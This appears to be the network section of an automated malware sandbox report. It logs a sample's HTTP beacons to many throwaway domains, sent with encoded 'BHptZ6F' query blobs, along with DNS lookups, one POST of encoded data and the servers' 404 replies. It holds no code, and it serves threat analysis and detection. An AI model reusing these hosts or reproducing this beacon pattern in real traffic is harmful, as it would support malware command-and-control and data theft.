                Source: global trafficHTTP traffic detected: GET /8ewn/?RZ=0nkpmZbx9Z4P2&BHptZ6F=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrFHLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblKXuHNDxI7tmrBLFv1SmPdd+ShDH4FU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.remedies.proConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /440l/?BHptZ6F=9t5r8PtstBUGfqpIeh5XnEiswD9luMiEeVsajtw7Z3dqDkGB8mLGChY9CqfKEaHyEvKJDzANYYXJmO8Xh0K1SfJD5xex/OhwsPZZ5DEaSUshfqY+26Bd8yM=&RZ=0nkpmZbx9Z4P2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.egyshare.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8mlm/?BHptZ6F=Dou+d174n903Q5s8eGVlbncTBC0Rpufru8Nex+2NzpzCLkW84PIBEnPU/VIOuudaHO13J+F+WsJAELWMIa4GeHkI0XjsMpOmPR3vOajhWYhkzVz3w31CV1o=&RZ=0nkpmZbx9Z4P2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.appsolucao.shopConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /3ifu/?BHptZ6F=u5oj/oWevlm54LOT1+Bryx675u+IDrtDZr257qJzt/2kXoBMan19x+0MdpxIfeL/WChZbD4JNYT/SNFPC81SuzkGtR7263FvFtQ21l4S/sR8VHVbXOTd4oM=&RZ=0nkpmZbx9Z4P2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.samundri.onlineConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4ii9/?RZ=0nkpmZbx9Z4P2&BHptZ6F=DCK/bgCIPtpt2RJApr/S57a5c6dyUmc4/YRC2H7mEi+GV8MabGqvART7ZhzmedatEBHVT2HbXE2R9ehhzokwzGc74R/EcNhRi8s6fgxoYqpZFSK7yfL6tiw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.happyjam.lifeConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /sa1b/?BHptZ6F=XYHJVoT0LuIOm26Tyq9N91avW6u0HKWTSvSmIrnltmLk6JYzFfgCVHRXJm9nnHtkqw/GQg9hdUic1chKWcYHIwgC/tmXBuLbW2sUc5PcpWY1XILnhN44V5I=&RZ=0nkpmZbx9Z4P2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.t19yd.topConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gua3/?RZ=0nkpmZbx9Z4P2&BHptZ6F=PEExTvPebnfdN5xst02JMzGti5FnGkiLE22WiywfEIelsbdwqCVd6ByVLBEklw1lRQ+mhNbJQBi9PlJBFsZX42nwE3ew6u8Wba+OVKdJMXKWWGbfqYbjt0U= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.atendefacil.infoConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /k4tn/?RZ=0nkpmZbx9Z4P2&BHptZ6F=UszxsXnyXaHrix4mOaqJD7vMyBmxMOeCUNKfuMYEqjdUerJZ7q+fEOQwPEbVbpTJrGRa9GB6/NRWLuSsaWPLUhjS0DDan+QLtyBM3L4kv6zOvH8nY/xHjUE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.sitioseguro.blogConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /tskk/?BHptZ6F=o5GB+IawIAU5T0thXdQTAhCz8F67YQPQT/nwZCkciWz+LkCAD5WzKPOp+WFYKDZnS0ikteADWtOd2j97JYt8nhoktlw8l2JH1Fe3FVr0kJJ2WjNY2yZGKR8=&RZ=0nkpmZbx9Z4P2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.dating-apps-az-dn5.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /27s6/?RZ=0nkpmZbx9Z4P2&BHptZ6F=3HPpqXJ7+KzZdUbztAJQoIdlDoC5J9hYXz+VcheInCeAf0Mmt05i/k62iF4aOsJa+VYW+vyKTPXBSx5msm7TgI/vrOYQcOVU79uPxUHt14iAAYzPN76r48s= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.whisperart.netConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ez1t/?BHptZ6F=6fEYs/GnwtqWMztB9xFdTpyVwIgq4y66Lrjdt5EE8ztyQFcx1ZWnbcrnPkjaT/5aXxdNApMw2aINlctYTPbgIAplS4neSxI29SjRMg4iVPNQf+tma6zkIeo=&RZ=0nkpmZbx9Z4P2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.ana-silverco.shopConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq8B3cYE1WLpspuVk6wMXVtPZnEUyIhQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.bloodbalancecaps.shopConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.betmatchx.online
                Source: global trafficDNS traffic detected: DNS query: www.egldfi.xyz
                Source: global trafficDNS traffic detected: DNS query: www.remedies.pro
                Source: global trafficDNS traffic detected: DNS query: www.egyshare.xyz
                Source: global trafficDNS traffic detected: DNS query: www.appsolucao.shop
                Source: global trafficDNS traffic detected: DNS query: www.samundri.online
                Source: global trafficDNS traffic detected: DNS query: www.happyjam.life
                Source: global trafficDNS traffic detected: DNS query: www.t19yd.top
                Source: global trafficDNS traffic detected: DNS query: www.atendefacil.info
                Source: global trafficDNS traffic detected: DNS query: www.uynline.shop
                Source: global trafficDNS traffic detected: DNS query: www.sitioseguro.blog
                Source: global trafficDNS traffic detected: DNS query: www.dating-apps-az-dn5.xyz
                Source: global trafficDNS traffic detected: DNS query: www.whisperart.net
                Source: global trafficDNS traffic detected: DNS query: www.ana-silverco.shop
                Source: global trafficDNS traffic detected: DNS query: www.bloodbalancecaps.shop
                Source: unknownHTTP traffic detected: POST /440l/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.egyshare.xyzOrigin: http://www.egyshare.xyzContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Connection: closeContent-Length: 204Referer: http://www.egyshare.xyz/440l/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36Data Raw: 42 48 70 74 5a 36 46 3d 77 76 52 4c 2f 37 41 6a 6a 45 63 5a 49 4a 5a 47 53 48 64 42 7a 55 76 70 79 43 4e 67 6c 59 4f 65 53 48 45 37 73 71 4a 42 62 6d 70 67 42 33 32 50 78 6b 6a 48 4c 57 6b 33 4f 62 72 45 66 4f 54 2f 41 2b 65 77 50 30 46 47 65 4e 48 72 6d 2b 49 71 2b 56 66 48 5a 76 74 36 37 54 36 57 39 73 39 72 69 50 6c 38 6d 56 63 34 46 52 4d 35 62 4d 5a 4d 39 5a 4a 58 39 6c 6d 4c 73 41 73 33 47 74 70 31 48 33 50 30 31 6e 44 2b 34 63 38 62 68 69 42 72 6e 34 38 55 6a 70 6f 65 66 55 5a 34 42 65 49 62 71 2f 63 68 47 7a 73 57 35 2b 65 73 31 66 31 6f 6b 62 69 34 74 52 77 49 38 43 63 64 4a 78 2b 48 44 77 3d 3d Data Ascii: BHptZ6F=wvRL/7AjjEcZIJZGSHdBzUvpyCNglYOeSHE7sqJBbmpgB32PxkjHLWk3ObrEfOT/A+ewP0FGeNHrm+Iq+VfHZvt67T6W9s9riPl8mVc4FRM5bMZM9ZJX9lmLsAs3Gtp1H3P01nD+4c8bhiBrn48UjpoefUZ4BeIbq/chGzsW5+es1f1okbi4tRwI8CcdJx+HDw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:37:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:37:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:37:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:37:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 16:37:23 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693de8b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 16:37:25 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693de8b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 16:37:28 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693de8b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 16:37:31 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693de8b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:37:38 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:37:41 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
